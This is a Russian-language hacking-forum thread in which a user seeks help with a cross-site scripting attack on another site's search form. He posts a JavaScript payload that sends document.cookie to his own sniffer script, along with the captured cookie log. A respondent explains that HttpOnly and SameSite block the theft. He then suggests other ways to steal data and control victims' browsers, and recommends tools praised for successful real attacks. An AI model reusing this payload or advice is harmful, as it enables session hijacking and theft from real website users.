Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Почему код не работает ? (https://forum.antichat.xyz/showthread.php?t=483840)

amanow 22.05.2021 19:35

Здравствуйте уважаемые форумчане столкнулся с такой проблемой есть сайт с xss ( другой сайт а не тот про который я писал в другой теме ) в форме поиска.Поиск осушуствляется методом post так вот для перехвата куки создал у себя на хосте файл perehod.html и вставил туда код

Код:

Code:

img = new Image();img.src="http://domain.ru/snif.php?cookie="+document.cookie;" > // это ссылка на снифер для кражи куки

setTimeout('explForm.submit()', 1);

вроде бы всё правильно юзер переходит по ссылке http://domain.ru/perehod.html после нескольких секунд перенаправляет на https://sait.ru/forum/?act=search но куки записываются не полностью нету SESID а только вот это

Код:

Code:
New cookie accept from        at Saturday 22nd of May 2021 07:40:27 PM REFERER: http://domain.ru/perehod.html
======================
_ym_uid=1618669368878418167; _ym_d=1618669368; _ga=GA1.2.1294811097.1619781555; s_style=simple; s_order=desc
======================

скажите пожалуйста в чем ошибка и как исправить заранее спасибо.

crlf 22.05.2021 20:42

Скорее всего кука HttpOnly, они "недоступны" JS-y. Так же, возможно, мешает SameSite, так как, по сути, юзается CSRF 2 XSS, и этот момент должен решиться дополнительным запросом с трастового ориджина. Более подробно про параметры кук можно прочитать тут, а про SameSite, в частности, тут.

amanow 22.05.2021 20:48

Цитата:

Сообщение от crlf
crlf said:

Скорее всего кука HttpOnly, они "недоступны" JS-y. Так же, возможно, мешает SameSite, так как, по сути, юзается CSRF 2 XSS, и этот момент должен решиться дополнительным запросом с трастового ориджина. Более подробно про параметры кук можно прочитать
тут
, а про SameSite, в частности,
тут
.

значить куки достать не получится

crlf 22.05.2021 20:55

Цитата:

Сообщение от amanow
amanow said:

значить куки достать не получится

Можно найти где-то отражение параметров, типа phpinfo и чего-то подобного и отправить себе, но это редкость. Сами куки-то не особо и нужны, XSS позволяет управлять клиентом. Т.е. можно сделать всё что нужно зарание, заложив последовательность действий в скрипт, а браузер жертвы выполнит в момент триггера XSS.

amanow 22.05.2021 21:00

Цитата:

Сообщение от crlf
crlf said:

Можно найти где-то отражение параметров, типа phpinfo и чего-то подобного и отправить себе, но это редкость. Сами куки-то не особо и нужны, XSS позволяет управлять клиентом. Т.е. можно сделать всё что нужно зарание, заложив последовательность действий в скрипт, а браузер жертвы выполнит в момент триггера XSS.

Можно свами поговорить в лс ?

amanow 22.05.2021 21:02

Цитата:

Сообщение от crlf
crlf said:

Можно найти где-то отражение параметров, типа phpinfo и чего-то подобного и отправить себе, но это редкость. Сами куки-то не особо и нужны, XSS позволяет управлять клиентом. Т.е. можно сделать всё что нужно зарание, заложив последовательность действий в скрипт, а браузер жертвы выполнит в момент триггера XSS.

я просто пока не особо в этом понимаю но хочу научится может дадите готовый такой скрипт

crlf 22.05.2021 22:34

Цитата:

Сообщение от amanow
amanow said:

Можно свами поговорить в лс ?

Вряд ли смогу помочь с чем-то конкретным, а общие вопросы можно задавать на форуме открыто

Цитата:

Сообщение от amanow
amanow said:

я просто пока не особо в этом понимаю но хочу научится может дадите готовый такой скрипт

Нет никаких проблем, для того чтобы научиться нужно сделать локальный стенд. Воссоздать приблизительные условия, т.е. поднять несколько виртуальных хостов, установить любую CMS на один из них, добавить туда XSS уязвимость или использовать общеизвестную, и с двух браузеров (атакующий/жертва) пробовать эксплуатировать.

Для автоматической эксплуатации атаки существуют XSS фреймворки, типа BeEF. Но я бы порекомендовал тулзу от нашего МоА мембера @psihoz26 - el Scripto. Которая создавалась как раз для таких случаев и была не раз применена в реальных и, самое главное, успешных атаках. Имеет много готовых пресетов для известных CMS, изучая и используя которые можно слепить свой, админку и кучу решённых подводных камней возникающих при межсайтовом скриптинге.

Как только локально всё получится, то и удалённо будет тоже ок, можно даже не сомневаться, останется только подкорректировать данные и урлы под требуемый кейс.


Время: 12:06